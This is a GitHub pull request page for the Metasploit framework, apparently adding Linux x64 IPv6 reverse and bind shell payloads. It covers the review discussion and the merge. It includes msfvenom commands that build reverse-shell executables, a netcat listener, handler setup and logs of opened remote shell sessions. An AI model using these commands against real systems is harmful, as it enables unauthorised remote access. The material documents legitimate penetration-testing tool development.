New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add linux x64 ipv6 reverse shell #11039

Merged
merged 10 commits into from Feb 1, 2019

Conversation

Projects
None yet
7 participants
@epi052
Copy link
Contributor

epi052 commented Nov 29, 2018

Implements inline x86_64 Linux reverse bourne shell over IPv6.

Verification

List the steps needed to make sure this thing works

  • Select IPv6 address ifconfig ...
  • Build executable ./msfvenom -p linux/x64/shell_reverse_ipv6_tcp LHOST='dead:beef:2::1009' -f elf -o test.elf
  • Start an IPv6 netcat listener nc -nvl6p 4444
  • Run binary ./test.elf
  • Run command to test shell works id

connect syscall to view sockaddr_in6 struct

eth0-scopeid

Demonstration

Create elf and upload to remote machine

loki-1

Start listener and catch callback

loki-2

epi052 added some commits Nov 29, 2018

Add Linux x86_64 IPv6 Inline Reverse Shell
Implements inline x86_64 Linux reverse bourne shell over IPv6.
Fixed lport and scopeid offsets.
Offsets for scopeid and lport were incorrect in the previous commit.
Updated offsets to the correct values.  Confirmed by viewing the connect
syscall values with strace.

@Green-m Green-m added the payload label Nov 30, 2018

Add Linux x86_64 IPv6 Inline Bind Shell
Implements inline x86_64 Linux bourne bind shell over IPv6.
@sempervictus

This comment has been minimized.

Copy link
Contributor

sempervictus commented Dec 3, 2018

Any chance you could implement via metasm in lib? Makes for much more reusable shellcode.
Thanks for pushing this.

@epi052

This comment has been minimized.

Copy link
Contributor Author

epi052 commented Dec 4, 2018

I looked through the other payloads for examples. Are you asking for something similar to
metasploit-framework/modules/payloads/stages/linux/x64/meterpreter.rb?

All of the payloads I could find appear to have the assembly as a string, then a call to Metasm::Shellcode.assemble

Is that all you're looking for?

@OJ

This comment has been minimized.

Copy link
Contributor

OJ commented Dec 4, 2018

Implement shellcode via metasm in lib.
Per the linked request
    #11039 (comment)
Rewrote previous payload module to make use of metasm for more reusable
shellcode.
@epi052

This comment has been minimized.

Copy link
Contributor Author

epi052 commented Dec 5, 2018

Finished the bind shell. Mind taking a look at that before I do the reverse?

epi052 added some commits Dec 6, 2018

Implement reverse_ipv6 shellcode via metasm in lib.
Per the linked request
    #11039 (comment)
Rewrote previous version of payload module to make use of metasm for
more reusable shellcode.
@epi052

This comment has been minimized.

Copy link
Contributor Author

epi052 commented Dec 7, 2018

Both ipv6 payloads should be good to go.

Gemfile Outdated
@@ -1,4 +1,5 @@
source 'https://rubygems.org'
gem 'pry'

This comment has been minimized.

@busterb

busterb Dec 10, 2018

Contributor

We probably don't need this in this PR.

This comment has been minimized.

@sempervictus

sempervictus Dec 10, 2018

Contributor

Isn't pry already part of MSF? Or is that just a dev group thing?

This comment has been minimized.

@epi052

epi052 Dec 10, 2018

Author Contributor

I worked myself into a detached head state as far as git is concerned. Had never seen that and googled how to get the work I'd done back into the proper branch. The fix action snuck this little guy in. I never explicitly git added the Gemfile, however it got included and I didn't realize. I'll get it out of the PR shortly. Sorry about that.

This comment has been minimized.

@epi052

epi052 Dec 11, 2018

Author Contributor

Removed the modified Gemfile.

tcp_port.pop # removes the first useless / from the array
tcp_port.shift # removes the last useless / from the array
tcp_port = (port_order.map{|x| tcp_port[x]}).join('') # reorder the array and convert it to a string.
binding.pry

This comment has been minimized.

@wchen-r7

wchen-r7 Dec 14, 2018

Contributor

forgot something?

This comment has been minimized.

@epi052

epi052 Dec 14, 2018

Author Contributor

It appears so. I removed it from this branch/pull request. It looks like I need to go to git school... I clearly jacked something up. I wanted the two pull requests to be separate branches and separate work. However, it didn't work out that way. I'm sure it was user-error on my part. Thanks for checking it over.

I ended up getting both bind payloads in both branches exactly the same. Sorry again for the confusion.

not-a-smart-man

This comment has been minimized.

@epi052

epi052 Dec 14, 2018

Author Contributor

Along the same lines, what should I do about the other PR, since this one has both payloads anyway?

This comment has been minimized.

@bwatters-r7

bwatters-r7 Dec 18, 2018

Contributor

We could close the other, or fix this one. Closing the other would likely be easier, but it is up to you.

This comment has been minimized.

@epi052

epi052 Dec 20, 2018

Author Contributor

Closed the other PR. Please let me know if anything else is needed on my end.

@epi052 epi052 referenced this pull request Dec 20, 2018

Closed

Add linux x64 ipv6 bind shell #11047

0 of 5 tasks complete
@epi052

This comment has been minimized.

Copy link
Contributor Author

epi052 commented Jan 24, 2019

I know you all have been doing great things getting MSF 5.0 out and obviously been busy. Just wanted to check in and see if there was anything I still needed to do for this. Thanks!

@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Feb 1, 2019

tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom -p linux/x64/shell_reverse_ipv6_tcp -o revtcp_shell_ipv6.elf -f elf LHOST=fd34:fe56:7891:2f3a:eca2:a4dc:58c7:b176 LPORT=4567
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 90 bytes
Final size of elf file: 210 bytes
Saved as: revtcp_shell_ipv6.elf
On branch land-11039
nothing to commit, working directory clean
msf5 exploit(multi/handler) > set payload linux/x64/shell_reverse_ipv6_tcp
payload => linux/x64/shell_reverse_ipv6_tcp
msf5 exploit(multi/handler) > set lhost fd34:fe56:7891:2f3a:eca2:a4dc:58c7:b176
lhost => fd34:fe56:7891:2f3a:eca2:a4dc:58c7:b176
msf5 exploit(multi/handler) > set lport 4567
lport => 4567
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on fd34:fe56:7891:2f3a:eca2:a4dc:58c7:b176:4567 
[*] Command shell session 1 opened (fd34:fe56:7891:2f3a:eca2:a4dc:58c7:b176:4567 -> fd34:fe56:7891:2f3b:e5bf:bfc3:683c:74ee:57284) at 2019-02-01 11:34:40 -0600

id
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
pwd
/home/msfuser
ifconfig
ens32: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.134.159  netmask 255.255.255.0  broadcast 192.168.134.255
        inet6 fd34:fe56:7891:2f3b:f533:e23e:76b8:b9be  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::fdb9:5fa4:bd3a:780c  prefixlen 64  scopeid 0x20<link>
        inet6 fd34:fe56:7891:2f3b:e5bf:bfc3:683c:74ee  prefixlen 64  scopeid 0x0<global>
        ether 00:0c:29:08:11:58  txqueuelen 1000  (Ethernet)
        RX packets 192837  bytes 284112864 (284.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 117283  bytes 9710710 (9.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 373  bytes 29862 (29.8 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 373  bytes 29862 (29.8 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Feb 1, 2019

rapid7/metasploit-framework$ ./msfvenom -p linux/x64/shell_bind_ipv6_tcp -o bindtcp_shell_ipv6.elf -f elf LPORT=4567
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x64/shell_bind_ipv6_tcp):

   Name   Current Setting                          Required  Description
   ----   ---------------                          --------  -----------
   LPORT  4567                                     yes       The listen port
   RHOST  fd34:fe56:7891:2f3b:f533:e23e:76b8:b9be  no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > run

[*] Started bind TCP handler against fd34:fe56:7891:2f3b:f533:e23e:76b8:b9be:4567
[*] Command shell session 4 opened (fd34:fe56:7891:2f3a:eca2:a4dc:58c7:b176:39182 -> fd34:fe56:7891:2f3b:f533:e23e:76b8:b9be:4567) at 2019-02-01 15:50:15 -0600

id
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
pwd
/home/msfuser
exit
[*] fd34:fe56:7891:2f3b:f533:e23e:76b8:b9be - Command shell session 4 closed.

@bwatters-r7 bwatters-r7 self-assigned this Feb 1, 2019

@bwatters-r7 bwatters-r7 merged commit cb3ea8d into rapid7:master Feb 1, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

bwatters-r7 added a commit that referenced this pull request Feb 1, 2019

Land #11039, Add linux x64 ipv6 reverse shell
Merge branch 'land-11039' into upstream-master
@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Feb 1, 2019

Release Notes

This PR adds two new linux x64 IPv6 shell payloads: reverse and bind.

msjenkins-r7 added a commit that referenced this pull request Feb 1, 2019

Land #11039, Add linux x64 ipv6 reverse shell
Merge branch 'land-11039' into upstream-master
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment